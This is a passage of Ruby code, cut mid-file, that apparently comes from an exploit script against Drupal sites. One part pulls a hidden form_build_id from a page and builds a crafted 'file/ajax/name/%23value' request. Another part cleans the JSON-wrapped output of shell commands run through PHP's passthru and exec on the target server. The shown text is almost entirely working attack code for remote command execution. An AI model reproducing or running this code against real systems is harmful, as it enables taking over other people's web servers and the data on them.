$session_cookie)\n\n form_name = \"form_build_id\"\n puts verbose(\"Form name : #{form_name}\") if $verbose\n\n form_value = response.body.match(/input type=\"hidden\" name=\"#{form_name}\" value=\"(.*)\"/).to_s.slice(/value=\"(.*)\"/, 1).to_s.strip\n puts warning(\"WARNING: Didn't detect #{form_name}\") if form_value.empty?\n puts verbose(\"Form value : #{form_value}\") if $verbose\n\n url = $target + \"#{$clean_url}file/ajax/name/%23value/\" + form_value\n payload = \"#{form_name}=#{form_value}\"\n end\n\n return url, payload\nend\n\n\n# Function clean_result <input>\ndef clean_result(input)\n #result = JSON.pretty_generate(JSON[response.body])\n #result = $drupalverion.start_with?(\"8\")? JSON.parse(clean)[0][\"data\"] : clean\n clean = input.to_s.strip\n\n # PHP function: passthru\n # For: <payload>[{\"command\":\"insert\",\"method\":\"replaceWith\",\"selector\":null,\"data\":\"\\u003Cspan class=\\u0022ajax-new-content\\u0022\\u003E\\u003C\\/span\\u003E\",\"settings\":null}]\n clean.slice!(/\\[{\"command\":\".*}\\]$/)\n\n # PHP function: exec\n # For: [{\"command\":\"insert\",\"method\